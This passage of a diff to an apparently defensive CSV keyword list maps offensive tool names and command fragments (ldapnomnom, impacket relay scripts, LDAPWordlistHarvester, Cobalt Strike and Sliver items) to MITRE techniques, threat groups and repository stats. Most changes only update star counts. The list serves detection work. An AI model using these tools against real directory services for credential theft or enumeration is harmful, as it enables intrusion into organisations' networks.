APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*ldapattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ldapattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*ldapdomaindump*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" -"*LDAPDomainDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*LDAPDomainDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*ldapfilter:*admincount=1* /format:hashcat*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*LdapMiner*","offensive_tool_keyword","ldapminer","This is a tool I wrote to collect information from different LDAP Server implementation. 
This was written in C with the Netscape C","T1016 - T1018 - T1021 - T1046 - T1056 - T1069 - T1078 - T1087 - T1114 - T1482 - T1526 - T1597","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://sourceforge.net/projects/ldapminer/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*ldapnomnom --input*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","N/A","7","697","60","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" -"*ldapnomnom*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","60","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" -"*ldapnomnom-darwin-*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","60","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" -"*ldapnomnom-linux-*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","60","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" -"*ldapnomnom-main*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - 
T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","60","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" -"*ldapnomnom-windows-386.exe*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","60","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" -"*ldapnomnom-windows-amd64.exe*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","60","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" -"*ldapnomnom-windows-arm64.exe*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","60","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom --input*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation 
Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-darwin-*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-linux-*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-main*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-windows-386.exe*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-windows-amd64.exe*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" 
+"*ldapnomnom-windows-arm64.exe*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" "*LDAP-Password-Hunter*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","10","2","189","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*ldaprelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*ldaprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ldaprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*LdapRelayScan.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*LdapRelayScan.py*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","N/A","4","389","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" -"*LdapRelayScan-main*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","4","389","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"*LdapRelayScan.py*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","N/A","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"*LdapRelayScan-main*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 
T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" "*ldapsearchad.py*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" "*ldapsearch-ad.py*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" -"*ldap-searcher *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*ldap-searcher *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - 
T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*ldapsentinel * raw *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ldapsentinel forest user*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*LdapSignCheck.exe*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" 
@@ -13057,9 +13214,9 @@
 "*LdapSignCheck.sln*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z"
 "*ldapsigncheck.x64.*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z"
 "*ldapsigncheck.x86.*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z"
-"*LDAPWordlistHarvester.ps1*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","218","14","2023-10-01T21:12:10Z","2023-09-22T10:10:10Z"
-"*LDAPWordlistHarvester.py*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","218","14","2023-10-01T21:12:10Z","2023-09-22T10:10:10Z"
-"*LDAPWordlistHarvester-main*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","218","14","2023-10-01T21:12:10Z","2023-09-22T10:10:10Z"
+"*LDAPWordlistHarvester.ps1*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z"
+"*LDAPWordlistHarvester.py*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z"
+"*LDAPWordlistHarvester-main*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z"
 "*ldd2bloodhound*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z"
 "*ldeep cache *","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z"
 "*ldeep ldap -u *","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z"
@@ -13067,34 +13224,34 @@ "*ldeep*ldap_activedirectory.py*","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" "*ldeep_dump_users_enabled.json","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" "*ldeep_dump_users_enabled.lst","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" -"*ldeep_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*ldif2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*leaky/leakbuf.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - 
